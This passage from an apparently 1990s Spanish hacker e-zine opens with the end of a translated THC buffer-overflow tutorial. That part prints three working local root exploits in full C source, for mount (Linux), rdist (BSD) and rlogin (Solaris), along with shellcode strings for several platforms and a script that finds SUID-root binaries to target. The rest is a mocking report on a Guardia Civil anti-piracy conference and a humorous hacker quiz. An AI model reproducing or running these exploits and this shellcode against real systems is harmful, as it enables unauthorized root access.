  636.         En cualquier caso continua buscando nuevos programas vulnerables,
  637.  porque siempre es mejor usar exploits que no sean muy conocidos entre la
  638.  gran muchedumbre de lamers abusadores de exploits.
  639.  
  640.  [°g°] °palabras finales°
  641.  ~~~~~~~~~~~~~~~~~~~~~~~~
  642.         despues de leer toda esta mierda deberias ser capaz de generar
  643.  overflow exploits tu solito, como demostracion he incluido tres exploits de
  644.  ejemplo (que funcionan). He modificado el codigo original y les he puesto
  645.  los mismos nombres de variables que en los ejemplos anteriores para que
  646.  puedas entenderlo facilmente.
  647.  
  648.  exploits:           exploit[1]  mount.c  - version linux: < 2.0.8
  649.                      exploit[2]  rdist.c  - todas las versiones de bsd: 2.0
  650.                      exploit[3]  rlogin.c - version solaris: 2.5 & 2.5.1
  651.  
  652.         si tienes una sensacion extraña en el estomago y si quieres quejarte
  653.  sobre este articulo, flamearme, si quieres obtener mas informacion, si
  654.  quieres intercambiar cosas o simplemente enviar un mail inservible, mandame
  655.  un email... PLASMOID@USA.NET y pronto en el servidor de
  656.  THC PLASMOID@INSECURITY.ORG Si no tienes conexion a internet ponte en
  657.  contacto conmigo en LORE BBS por van hauser/thc. Tambien puedes encontrarme
  658.  via IRC, normalmente estoy en el canal #bluebox si mi cuenta no esta k-lined
  659.  ;)
  660.                                                        - plasmoid/thc/deep
  661.                                                        The Hacker's Choice
  662.                                              Drinking Evil Elite Phreakers
  663.  
  664.  plasmoid deep/thc <plasmoid@usa.net>
  665.  
  666.  -----BEGIN PGP PUBLIC KEY BLOCK-----
  667.  Version: 2.6.3i
  668.  mQCNAzJZDKwAAAEEANBXUFXqCzZLKuPj7OwB5O7thWOHlzzsi6SEZfsbiysPU4TL
  669.  AMsBuCV4257Rr0//aEMt4CWjAkO3YWcBzBMvGQIDhT06v9SB4LZep6wJlSIsFK3v
  670.  L1x+iYzSlvoXOHYSBcjoXA3sDm+kzz49to77Z20bJru7upjHD8iQeMWdAg+hAAUR
  671.  tBtwbGFzbW9pZCA8cGxhc21vaWRAdXNhLm5ldD6JAJUDBRAyWQysyJB4xZ0CD6EB
  672.  AQ6GBACB1n9DkgHfnC7D245MZPpacEHI8Jwj0DV6inV19E9qWf4VDdXA8+9YLuUV
  673.  hsV1/WRX3sJWGWmAQASPitl2tc+7vWw6VC4gjif1XsRttIuNwmvU+DPY7ZULueFe
  674.  bKoLI2zXsnWm/+8PMjc6GSYsNrXSpUjqkH6nIt6+sytm2QyWBw==
  675.  =Vbcq
  676.  -----END PGP PUBLIC KEY BLOCK-----
  677.  
  678.  °exploit°[°1°]
  679.  ~~~~~~~~~~
  680.  /* -------------------------------------------------------------------------
  681.     mount.c - mount exploit for linux - version: < 2.0.10
  682.     discovered by bloodmask&vio/couin
  683.     coded by plasmoid/thc/deep for thc-magazine issue #3
  684.     12/12/96 - works also on umount
  685.     ------------------------------------------------------------------------- */
  686.  
  687.  #include <stdio.h>
  688.  
  689.  #define lv_size  1024
  690.  #define offset     30+lv_size+8*4
  691.  // -------------------------------------------------------------------------
  692.  long get_sp()
  693.  {
  694.    __asm__("movl %esp, %eax");
  695.  }
  696.  // -------------------------------------------------------------------------
  697.  main(int argc, char **argv)
  698.  {
  699.    char execshell[] =
  700.           "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
  701.           "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
  702.           "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
  703.  
  704.   char buffer[lv_size+4*8];
  705.   unsigned long *ptr2 = NULL;
  706.   char           *ptr = NULL;
  707.   int           i;
  708.  
  709.   for(i=0;i<lv_size+4*8;i++)
  710.    buffer[i]=0x00;
  711.   ptr=buffer;
  712.  
  713.   for(i=0;i<lv_size-strlen(execshell);i++)
  714.    *(ptr++)=0x90;
  715.   for(i=0;i<strlen(execshell);i++)
  716.    *(ptr++)=execshell[i];
  717.   ptr2=(long *)ptr;
  718.   for(i=1;i<2;i++)
  719.    *(ptr2++)=get_sp()+offset;
  720.  
  721.   printf("discovered by bloodmask&vio/couin\ncoded by plasmoid/thc/deep\nfor
  722.   thc-magazine issue #3\n");
  723.   (void)alarm((int)0);
  724.   execl("/bin/mount", "mount", buffer, NULL);
  725.  }
  726.  
  727.  
  728.  °exploit°[°2°]
  729.  ~~~~~~~~~~
  730.  /* -------------------------------------------------------------------------
  731.     rdist.c - rdist exploit for freebsd & bsd/os - version: 2.0
  732.     discovered by brian mitchell
  733.     coded by plasmoid/thc/deep for thc-magazine issue #3
  734.     12/12/96
  735.     ------------------------------------------------------------------------- */
  736.  
  737.  #include <stdio.h>
  738.  
  739.  #define lv_size   256
  740.  #define offset     30+lv_size+8*4
  741.  // -------------------------------------------------------------------------
  742.  long get_sp()
  743.  {
  744.    __asm__("movl %esp, %eax");
  745.  }
  746.  // -------------------------------------------------------------------------
  747.  main(int argc, char **argv)
  748.  {
  749.   char execshell[]=
  750.          "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
  751.          "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
  752.          "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
  753.          "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
  754.  
  755.   char buffer[lv_size+4*8];
  756.   unsigned long *ptr2 = NULL;
  757.   char           *ptr = NULL;
  758.   int           i;
  759.  
  760.   for(i=0;i<lv_size+4*8;i++)
  761.    buffer[i]=0x00;
  762.   ptr=buffer;
  763.  
  764.   for(i=0;i<lv_size-strlen(execshell);i++)
  765.    *(ptr++)=0x90;
  766.   for(i=0;i<strlen(execshell);i++)
  767.    *(ptr++)=execshell[i];
  768.   ptr2=(long *)ptr;
  769.   for(i=1;i<2;i++)
  770.    *(ptr2++)=get_sp()+offset;
  771.  
  772.   printf("discovered by brian mitchell\ncoded by plasmoid/thc/deep\nfor
  773.   thc-magazine issue #3\n");
  774.   execl("/usr/bin/rdist", "rdist", "-d", buffer, "-d", buffer, NULL);
  775.  }
  776.  
  777.  °exploit°[°3°]
  778.  ~~~~~~~~~~
  779.  /*
  780.   * rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines
  781.   * by exploiting the gethostbyname() overflow in rlogin.
  782.   *
  783.   * gcc -o rlogin-exploit rlogin-exploit.c
  784.   *
  785.   * Jeremy Elson, 18 Nov 1996
  786.   * jeremy.elson@nih.gov
  787.   */
  788.  
  789.  #include <stdio.h>
  790.  #include <stdlib.h>
  791.  #include <sys/types.h>
  792.  #include <unistd.h>
  793.  
  794.  #define BUF_LENGTH      8200
  795.  #define EXTRA           100
  796.  #define STACK_OFFSET    4000
  797.  #define SPARC_NOP       0xa61cc013
  798.  
  799.  u_char sparc_shellcode[] =
  800.  "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
  801.  "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
  802.  "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
  803.  "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  804.  "\x82\x10\x20\x3b\x91\xd4\xff\xff";
  805.  
  806.  u_long get_sp(void)
  807.  {
  808.    __asm__("mov %sp,%i0 \n");
  809.  }
  810.  
  811.  void main(int argc, char *argv[])
  812.  {
  813.    char buf[BUF_LENGTH + EXTRA];
  814.    long targ_addr;
  815.    u_long *long_p;
  816.    u_char *char_p;
  817.    int i, code_length = strlen(sparc_shellcode);
  818.  
  819.    long_p = (u_long *) buf;
  820.  
  821.    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
  822.      *long_p++ = SPARC_NOP;
  823.  
  824.    char_p = (u_char *) long_p;
  825.  
  826.    for (i = 0; i < code_length; i++)
  827.      *char_p++ = sparc_shellcode[i];
  828.  
  829.    long_p = (u_long *) char_p;
  830.  
  831.    targ_addr = get_sp() - STACK_OFFSET;
  832.    for (i = 0; i < EXTRA / sizeof(u_long); i++)
  833.      *long_p++ = targ_addr;
  834.  
  835.    printf("Jumping to address 0x%lx\n", targ_addr);
  836.  
  837.    execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
  838.    perror("execl failed");
  839.  }
  840.  
  841.  
  842.  °apendice°[°A°]
  843.  ~~~~~~~~~~~~~~~
  844.  ----------------------------------------------------------------------------
  845.  linux/i80386+
  846.  ----------------------------------------------------------------------------
  847.  codigo ensamblador:
  848.  ~~~~~~~~~~~~~~
  849.                 jmp    end_of_code
  850.  execve:        popl   %esi
  851.                 movl   %esi,0x8(%esi)
  852.                 xorl   %eax,%eax
  853.                 movb   %eax,0x7(%esi)
  854.                 movl   %eax,0xc(%esi)
  855.                 movb   $0xb,%al
  856.                 movl   %esi,%ebx
  857.                 leal   0x8(%esi),%ecx
  858.                 leal   0xc(%esi),%edx
  859.                 int    $0x80
  860.                 xorl   %ebx,%ebx
  861.                 movl   %ebx,%eax
  862.                 inc    %eax
  863.                 int    $0x80
  864.  end_of_code:   call   exec_prog
  865.                 .string "/bin/sh\"
  866.  
  867.  cadena para c:
  868.  ~~~~~~~~~~~~~~~~~~
  869.  char execshell[] =
  870.         "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
  871.         "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
  872.         "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
  873.  
  874.  ----------------------------------------------------------------------------
  875.  bsd/os/i80386+ and freebsd/i80386+
  876.  ----------------------------------------------------------------------------
  877.  ensamblador:
  878.  ~~~~~~~~~~~~~~~
  879.                 jmp     end_of_code
  880.  execve:        popl    %esi
  881.                 leal    (%esi), %ebx
  882.                 movl    %ebx, 0x0b(%esi)
  883.                 xorl    %edx, %edx
  884.                 movl    %edx, 7(%esi)
  885.                 movl    %edx, 0x0f(%esi)
  886.                 movl    %edx, 0x14(%esi)
  887.                 movb    %edx, 0x19(%esi)
  888.                 xorl    %eax, %eax
  889.                 movb    $59, %al
  890.                 leal    0x0b(%esi), %ecx
  891.                 movl    %ecx, %edx
  892.                 pushl   %edx
  893.                 pushl   %ecx
  894.                 pushl   %ebx
  895.                 pushl   %eax
  896.                 jmp     bewm
  897.  end_of_code:   call    execve
  898.                 .string   '/bin/sh'
  899.                 .byte   1, 1, 1, 1
  900.                 .byte   2, 2, 2, 2
  901.                 .byte   3, 3, 3, 3
  902.  bewm:          .byte   0x9a, 4, 4, 4, 4, 7, 4
  903.  
  904.  cadena para c:
  905.  ~~~~~~~~~~~~~~~~~~
  906.  char execshell[]=
  907.         "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
  908.         "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
  909.         "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
  910.         "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
  911.  
  912.  
  913.  
  914.  ----------------------------------------------------------------------------
  915.  solaris/sparc 
  916.  ----------------------------------------------------------------------------
  917.  ensamblador:
  918.  ~~~~~~~~~~~~~~~
  919.                 sethi   0xbd89a, %l6
  920.                 or      %l6, 0x16e, %l6
  921.                 sethi   0xbdcda, %l7
  922.                 and     %sp, %sp, %o0
  923.                 add     %sp, 8, %o1
  924.                 xor     %o2, %o2, %o2
  925.                 add     %sp, 16, %sp
  926.                 std     %l6, [%sp - 16]
  927.                 st      %sp, [%sp - 8]
  928.                 st      %g0, [%sp - 4]
  929.                 mov     0x3b, %g1
  930.                 ta      8
  931.                 xor     %o7, %o7, %o0
  932.                 mov     1, %g1
  933.                 ta      8
  934.  
  935.  cadena para c:
  936.  ~~~~~~~~~~~~~~~~~~
  937.  char execshell[59]=
  938.         0x2d,0x0b,0xd8,0x9a,0xac,0x15,0xa1,0x6e,0x2f,0x0b,0xdc,0xda,0x90,
  939.         0x0b,0x80,0x0e,0x92,0x03,0xa0,0x08,0x94,0x1a,0x80,0x0a,0x9c,0x03,
  940.         0xa0,0x10,0xec,0x3b,0xbf,0xf0,0xdc,0x23,0xbf,0xf8,0xc0,0x23,0xbf,
  941.         0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x08,0x90,0x1b,0xc0,0x0f,
  942.         0x82,0x10,0x20,0x01,0x91,0xd0,0x20,0x08";
  943.  
  944.   version opcional:
  945.   char execshell[54]=
  946.             0x9fc0202c,0xc0247ff5,0xe227bff0,0xc027bff4,0x9207bff0,0x901d200a,
  947.             0x901a200a,0x8210203b,0x91d02008,0x82102001,0x91d02008,0xa3c3e004,
  948.             "/bin/sh";
  949.  
  950.  
  951.  ----------------------------------------------------------------------------
  952.  sunos/sparc 
  953.  ----------------------------------------------------------------------------
  954.  ensamblador:
  955.  ~~~~~~~~~~~~~~~
  956.                 sethi   0xbd89a, %l6
  957.                 or      %l6, 0x16e, %l6
  958.                 sethi   0xbdcda, %l7
  959.                 and     %sp, %sp, %o0
  960.                 add     %sp, 8, %o1
  961.                 xor     %o2, %o2, %o2
  962.                 add     %sp, 16, %sp
  963.                 std     %l6, [%sp - 16]
  964.                 st      %sp, [%sp - 8]
  965.                 st      %g0, [%sp - 4]
  966.                 mov     0x3b, %g1
  967.                 mov     -0x1, %l5
  968.                 ta      %l5 + 1
  969.                 xor     %o7, %o7, %o0
  970.                 mov     1, %g1
  971.                 ta      %l5 + 1
  972.  
  973.  cadena para c:
  974.  ~~~~~~~~~~~~~~~~~~
  975.  char execshell[63]=
  976.         0x2d,0x0b,0xd8,0x9a,0xac,0x15,0xa1,0x6e,0x2f,0x0b,0xdc,0xda,0x90,
  977.         0x0b,0x80,0x0e,0x92,0x03,0xa0,0x08,0x94,0x1a,0x80,0x0a,0x9c,0x03,
  978.         0xa0,0x10,0xec,0x3b,0xbf,0xf0,0xdc,0x23,0xbf,0xf8,0xc0,0x23,0xbf,
  979.         0xfc,0x82,0x10,0x20,0x3b,0xaa,0x10,0x3f,0xff,0x91,0xd5,0x60,0x01,
  980.         0x90,0x1b,0xc0,0x0f,0x82,0x10,0x20,0x01,0x91,0xd5,0x60,0x01";
  981.  
  982.  ----------------------------------------------------------------------------
  983.  hp-ux9/hp9000
  984.  ----------------------------------------------------------------------------
  985.  cadena para c:
  986.  ~~~~~~~~~~~~~~~~~~
  987.  char execshell[]=
  988.         "\x34\x59\x01\x02\x34\x5a\x01\x32\x37\x5a\x3e\xf9\x6b\x3a\x3f\x01"
  989.         "\x63\x40\x3f\xff\x34\x5a\x01\x38\x63\x40\x3f\x35\x37\x5a\x3e\xf9"
  990.         "\x6b\x3a\x3f\x09\x63\x40\x3f\xff\x0b\x5a\x02\x9a\x6b\x3a\x3f\x11"
  991.         "\x34\x5a\x01\x22\x37\x5a\x3e\xf9\x6f\x3a\x3e\xf9\x20\x20\x08\x01"
  992.         "\x34\x16\x01\x1e\xe4\x20\xe0\x08\x36\xd6\x3e\xf9\x0b\x5a\x02\x9a"
  993.         "\x20\x20\x08\x01\x34\x16\x01\x0a\xe4\x20\xe0\x08\x36\xd6\x3e\xf9"
  994.         "\xe8\x5f\x1f\x35\x0b\x5a\x02\x9a\x01\x01\x01\x01\x01\x01\x01\x01"
  995.         "\x01\x01\x01\x01\x01\x01\x01\x01\x00/bin/sh";
  996.  
  997.  °apendice°[°B°]
  998.  ~~~~~~~~~~~
  999.  ----------------------------------------------------------------------------
  1000.  no operation - nop - para diferentes sistemas
  1001.  ----------------------------------------------------------------------------
  1002.  linux/i80386+                            -  char nop[1]=0x90;
  1003.  bsd/os/i80386+ and freebsd/i80386+       -  char nop[1]=0x90;
  1004.  procesador solaris/sparc                 -  char nop[4]=0xac15a16e;
  1005.  procesador sunos/sparc                   -  char nop[4]=0xac15a16e;
  1006.  hp-ux9/hp9000                            -  char nop[4]=0xac15a16e;
  1007.  
  1008.  °apendice°[°C°]
  1009.  ~~~~~~~~~~~
  1010.  ----------------------------------------------------------------------------
  1011.  linux/i80386+ y bsd/os/i80386+ y freebsd/i80386+
  1012.  ----------------------------------------------------------------------------
  1013.  averiguando el puntero de la pila:
  1014.  ~~~~~~~~~~~~~~~~~~~~~~~~~
  1015.  long get_sp()
  1016.  {
  1017.   __asm__("movl %esp,%eax");
  1018.  }
  1019.  
  1020.  ----------------------------------------------------------------------------
  1021.  procesador solaris/sparc y procesador sunos/sparc
  1022.  ----------------------------------------------------------------------------
  1023.  averiguando el puntero de la pila:
  1024.  ~~~~~~~~~~~~~~~~~~~~~~~~~
  1025.  long get_sp()
  1026.  {
  1027.   asm("or %sp, %sp, %i0");
  1028.  }
  1029.  
  1030.  °apendice°[°D°]
  1031.  ~~~~~~~~~~
  1032.  ----------------------------------------------------------------[cut here]-
  1033.  #!/bin/sh
  1034.  # findsuid.sh by plasmoid/thc/deep
  1035.  # important directories for linux system, try different ones
  1036.  # for other systems (/usr/etc, /usr/local/bin, /usr/local/etc, /usr/sbin)
  1037.  find /bin -user root -perm +a=s > suid.lst
  1038.  find /sbin -user root -perm +a=s >> suid.lst
  1039.  find /usr/bin -user root -perm +a=s >> suid.lst
  1040.  find /etc -user root -perm +a=s >> suid.lst
  1041.  find /var -user root -perm +a=s >> suid.lst
  1042.  ----------------------------------------------------------------[cut here]-
  1043.  
  1044.  <END OF FiLE - THC iN 1996>
  1045.  
  1046.  TRADUCIDO POR IPgh0st
  1047.  UNDERHACK
  1048.  http://underhack.islatortuga.com
  1049.  
  1050. ------------------------------------------------------------------------------
  1051. ██████████████████████████████████████████████████████████████████████████████
  1052. ------------------------------------------------------------------------------
  1053.  
  1054.                ▄──────────────────────────────────────────────▄
  1055.                │       CONFERENCIA DE LA GUARDIA CIVIL        │
  1056.                │                  EN EL SIMO                  │ 
  1057.                │                                              │
  1058.                │                                BY NOBODY     │
  1059.                █──────────────────────────────────────────────█
  1060.                │                                              │
  1061.                     
  1062.         Pues si, "los chicos de verde" desde que han creado una unidad
  1063.    especial contra los delitos informaticos, estan muy activos (seguimientos,
  1064.    detenciones, conferencias y vete a saber que mas ;-)
  1065.  
  1066.         Esta conferencia fue el viernes dia 7 de noviembre y su duracion era
  1067.    de 2 horas comenzando desde las 12:00 hasta las 14:00. La verdad es que
  1068.    estuvo bien y menos mal porque me tuve que fullar de una clase ;-) en la
  1069.    uni, fui con un colega (Angelipas) recuerdos !! 
  1070.  
  1071.         Entre los conferenciantes pudimos ver algunas personalidades en el
  1072.    campo, je je je. Eran 5 personas que nos estuvieron dando la conferencia
  1073.    que duro mas o menos una hora y luego fueron preguntas.
  1074.  
  1075.         Los cinco conferenciantes eran:
  1076.         
  1077.         - Sr Ribas : el mas famoso de todos ( el abogado del diablo "BSA").
  1078.         - Un periodista : el que controlaba la mesa, que por cierto metio la
  1079.           pata varias veces para encima presumir de que sabia del tema.
  1080.         - El director de Microsoft para luchar contra la pirateria: Algunas
  1081.           preguntas del publico no le gustaron mucho. ja ja ja
  1082.         - Un miembro de la Guardia Civil:  Nos solto el tipico rollo de lo
  1083.           efeciaz que eran y que tenian convenios en Europa con otros grupos
  1084.           policiales.
  1085.         - El director de la escuela de Ingenieros: La escuela ayuda a la poli.
  1086.  
  1087.         Pues estas cinco personas nos soltaron un discurso de unos 10 minutos.
  1088.   Fue bastante interesante, el que venia mas preparado era el miembro de la
  1089.   Guardia civil el cual nos paso unas diapositivas sobre el grupo de delitos
  1090.   informaticos. Nos informo que este grupo de la Guardia Civil han sido los
  1091.   primeros en usar sniffers para cazar a hackers (los de Tarragona) y que son
  1092.   pioneros, tambien nos dijo que cada cierto tiempo se renunen en Francia
  1093.   varios paises para intercambiar informacion de lo que pasa en esos paises
  1094.   (España, Francia, Inglaterra, Alemania y Dinamarca). Los otros discursos
  1095.   no fueron muy interesantes ya que la conferencia se enfoco mas a lo
  1096.   tipico (software ilegal) que a los hackers.
  1097.  
  1098.         Una cosa bastante graciosa fue que dijeron que muchas empresas borran
  1099.   o se niegan a pasar los famosos log's lo que dificulta mucho su trabajo,
  1100.   ja ja ja (esto lo dijo el Sr. Ribas). 
  1101.  
  1102.         Despues vinieron las preguntas(je je je) y en algunas la cosa se
  1103.   calento un poco, entre el publico pudimos ver profesionales, profesores,
  1104.   gente del Proyecto Lucas e incluso caras conocidas del Hack ;-). Un
  1105.   profesor de la Universidad de Oviedo dejo helado al de Microsoft al decirle
  1106.   que los alunmos no pueden pagar los precios que se piden por los programas y
  1107.   que Microsoft no era la unica conpañia que produce software !!. El del
  1108.   Proyecto Lucas hizo tragar polvo a la conferencia, ja ja ja cuando demostro
  1109.   que hay formas de distribuir soft de una manera mejor y que no todos los
  1110.   hackers se dedican a entrar en ordenadores (dando un ejemplo que pego
  1111.   fuerte, porque el periodista se hizo el sordo). Tambien dijeron que
  1112.   poseer cualquier crack es ilegal y puede ser penalizado, pero que usar
  1113.   ingenieria inversa para desmontar un programa y estudiarlo o mejorarlo
  1114.   no es ilegal siempre y cuando no se copie para su comercializacion.
  1115.  
  1116.         Como anecdota, poco antes de finalizar la conferencia entro el
  1117.   Director de la Guardia Civil y nos solto un pequeño discurso, al acabar
  1118.   la conferencia se habia preparado un banquete :), Ipas y yop nos pusimos
  1119.   detras del Director de la Guardia civil cuando la tele lo estaba
  1120.   entrevistando pero debemos tener mala pinta porque nos hicieron mover de
  1121.   alli ;-)
  1122.  
  1123.   Y esto fue todo en la famosa conferencia de la Guardia Civil en el Simo.
  1124.  
  1125.   En el stand que la Guardia Civil tenia en el Pabellon 2, habia 2 mujeres y
  1126.   un hombre (una rubia con un morbo y el hombre por lo que me pude enterar
  1127.   fue el que hizo el peritaje a los ordenadores de los Hackers de Tarragona).
  1128.   Si pasabas por el Stand te llevabas unos folletos y unas pegatinas( Yo odio
  1129.   la pirateria informatica).
  1130.  
  1131.   Lo que pone en el folleto, ja ja ja :
  1132.  
  1133.   <------------------------------------>
  1134.  
  1135.   PIRATERIA INFORMATICA = COPIA NO AUTORIZADA DE SOFTWARE.
  1136.  
  1137.   - Reproduccion y uso de un programa sin autorizacion del titular del
  1138.     copyright, y el uso simultaneo por parte de varios usuarios conectados
  1139.     a una red local de un programa instalado en el servidor, cuando no este
  1140.     expresamente autorizado.
  1141.   - Venta de reproducciones ilegales de programas, como la venta de CD por
  1142.     correo, llegandose a falsificar incluso los envoltorios, sellos de
  1143.     autenticidad y hologramas.
  1144.   - Fabricacion, puesta en circulacion y tenecia de CRACKS (sistemas para
  1145.     neutralizar dispositivos de proteccion de programas).
  1146.   - Distribucion de ordenadores nuevos con reproducciones no autorizados de
  1147.     programas que se entregan en discos flexibles, en CD o instaladas en su
  1148.     disco duro, incluyendose los sistemas operativos.
  1149.   - Descarga en el propio ordenador de programas sin autorizacion del titular
  1150.     del copyright, procedentes de BBS o de INTERNET, via www, ftp, e-mail,
  1151.     canales news o IRC.
  1152.   - En Centros de Formacion, la entrega de copias no autorizadas a los
  1153.     alumnos, la instalacion no autorizada en los ordenadores de las aulas y el
  1154.     uso de un numero de copias superior al de licencias.
  1155.   - Comercializacion no autorizada de programas por ex-empleados desleales de
  1156.     la compañia que ostenta su legitima propiedad.
  1157.  
  1158.   (Joer , creo que me he saltado casi todos }:-)
  1159.  
  1160.   10 RAZONES POR LAS QUE DEBES USAR PROGRAMAS ORIGINALES EN TU ORDENADOR:
  1161.  
  1162.   1- Podras utilizar tu programa sin problemas.
  1163.   2- Si tienes problemas, te daran ayuda tecnica.
  1164.   3- Comprar las nuevas versiones del programa te costara mucho menos.
  1165.   4- Tendras manuales de ayuda.
  1166.   5- No tendras virus en tu ordenador.
  1167.   6- Respetaras los derechos de autor y el esfuerzo de los creadores de
  1168.   software.
  1169.   7- Ayudaras al desarrollo de empresas que diseñan programas. Asi mas
  1170.   personas tendran empleo.
  1171.   8- Habra mas empresas, lo que es bueno para todo el sector y la sociedad en
  1172.   general.
  1173.   9- Seras un buen usuario de programas.
  1174.   10- Piratear programas no merece la pena. Solo te traera problemas.
  1175.  
  1176.   ¡AYUDANOS A PERSEGUIR A LOS BUCANEROS INFORMATICOS!
  1177.  
  1178.   Guardia Civil : http://www.guardiacivil.org
  1179.   Direccion General : consulta@guardiacivil.org
  1180.   Grupos de Delincuencia Informatica:gc.uco@mad.servicom.es
  1181.                                      gc.uco@recol.es
  1182.   Servicio de Policia Judicial: gc03@recol.es
  1183.  
  1184.   <-----------FIN------------------------>
  1185.  
  1186.         Pues esto ha sido todo colegas y solo me queda decir que a finales
  1187.   de Noviembre hay otra conferencias de varios dias en la Universidad de
  1188.   Merida, para mas informacion mirar el web de la Guardia Civil (tiene buena
  1189.   pinta y seguro que te ries, lastima que no pueda ir por la uni).
  1190.  
  1191.   Y desde aqui saludar a toda la peña de #hackers y #hack !!!!!!
  1192.   Grupos como - J.J.F.- , CYBERHACK, WAKANDA y todos los demas !!
  1193.   Con un especial saludo a los que vinieron al Simo !!
  1194.  
  1195. ------------------------------------------------------------------------------
  1196. ██████████████████████████████████████████████████████████████████████████████
  1197. ------------------------------------------------------------------------------
  1198.  
  1199.                          ──────────────────────┐
  1200.                           │ ERES UN HACKER???? │
  1201.                           └──────────────────────
  1202.  
  1203.    Este test ha sido realizado por: Felix Lee, John Haynes y Angela Thomas.
  1204.    Tambien ha sido traducido por Mac Crack (JJF Hackers Team). Compartiendo
  1205.    conocimientos, aprendemos todos.
  1206.  
  1207.    Bueno, vamos al asunto:
  1208.  
  1209.    Puntuacion:
  1210.  
  1211.    Si tu puntuacion esta entre.... Eres....
  1212.  
  1213.      ┌──────────────────────────────────────────────────- │
  1214.      │ 0 y 10     ->  Ni puta idea de que es un ordenador │
  1215.      │ 11 y 40    ->  simplemente un usuario              │
  1216.      │ 41 y 80    ->  un operador                         │
  1217.      │ 81 y 90    ->  un novato                           │
  1218.      │ 91 y 100   ->  un hacker                           │
  1219.      │ 101 y 180  ->  un guru                             │
  1220.      │ 181 y 200  ->  un maestro                          │
  1221.     ──────────────────────────────────────────────────────┘
  1222.  
  1223.    Ah! si no entiendes la puntuacion, parate aqui, y si la entiendes,
  1224.    alla vamos....
  1225.  
  1226.  
  1227.    1. Has usado alguna vez un ordenador?
  1228.    2. ...por lo menos 4 horas seguidas?
  1229.    3. ...mas de 8 horas?
  1230.    4. ...mas de 16 horas?
  1231.    5. ...mas de 32 horas?
  1232.    6. Le has puesto celo a tu ordenador alguna vez?
  1233.    7. Has perdido alguna clase por quedarte programando?
  1234.    8. ...un examen?
  1235.    9. ...una boda?
  1236.    10. ...tu propia boda?
  1237.    11. Has programado borracho alguna vez?
  1238.    12. ...tenia sentido a la mañana siguiente?
  1239.    13. Has programado alguna vez un simulador de vuelo?
  1240.    14. Te has cargado alguna vez el sello de garantia de alguna pieza de tu
  1241.    ordenador?
  1242.    15. has cambiado alguna vez el valor de 4?
  1243.    16. ...intencionadamente?
  1244.    17. ...en un lenguaje diferente a Fortran?
  1245.    18. Has usado DWIM para hacer tu vida mas interesante?
  1246.    19. Le has puesto nombre a algun ordenador?
  1247.    20. Te has quejado alguna vez por alguna palabra que no funcionaba
  1248.    correctamente?
  1249.    21. Has cambiado alguna vez de fondo?
  1250.    22. Cuantos dias tienes de edad?
  1251.    23. Te has intentado bajar alguna pizza de internet?
  1252.    24. Has inventado alguna vez un chiste sobre ordenadores?
  1253.    25. ...alguien lo pillo?
  1254.    26. Puedes recitar MacBeth?
  1255.    27. ...Al reves?
  1256.    28. Has visto "El pato Donald en Matematicalandia"?
  1257.    29. Has visto "Tron"?
  1258.    30. Has visto "Juegos de Guerra"?
  1259.    31. Sabes para que vale el ASCII?
  1260.    32. Y el EBCDIC?
  1261.    33. Puedes leer y escribir ASCII en hexadecimal?
  1262.    34. Te sabes el nombre de todos los codigos del ASCII?
  1263.    35. Puedes convertir de EBCDIC a ASCII y viceversa?
  1264.    36. Sabes que caracteres son iguales entre EBCDIC y ASCII?
  1265.    37. Tiene maxilares tu sistema?
  1266.    38. Has intentado definir tu propio numero para tener mas precision?
  1267.    39. Sabes escribir EBCDIC en hexadecimal?
  1268.    40. Puedes nombrar potencias de dos al menos hasta 2x1016 en orden
  1269.    arbitrario?
  1270.    41. ...y hasta 2x1032?
  1271.    42. ...y hasta 2x1064?
  1272.    43. Eres capaz de descifrar una tarjeta binaria simplemente mirando los
  1273.    agujeros?
  1274.    44. ...sintiendo los agujeros?
  1275.    45. Has remendado alguna vez codigo binario?
  1276.    46. ...incluso cuando estaba funcionando el programa?
  1277.    47. Has intentando alguna vez asfixiar un programa?
  1278.    48. Conoces a algun vicepresidente de IBM?
  1279.    49. ..no conoces a Bill, Dennis o ken?
  1280.    50. Has tomado alguna foto de un CRT?
  1281.    51. Has visto alguna pelicula en tu CRT?
  1282.    52. Has digitalizado alguna vez una foto?
  1283.    53. Siempre te olvidas de guardar tu osito de peluche?
  1284.    54. Has optimizado alguna vez un lazo IDE?
  1285.    55. Has optimizado alguna vez una burbuja?
  1286.    56. Te habla tu ordenador/terminal?
  1287.    57. Has hablado alguna vez con un modem?
  1288.    58. ...Te contesto?
  1289.    59. Puedes silvar 300 baudios?
  1290.    60. ...Y 1200?
  1291.    61. Puedes silvar numeros de telefono?
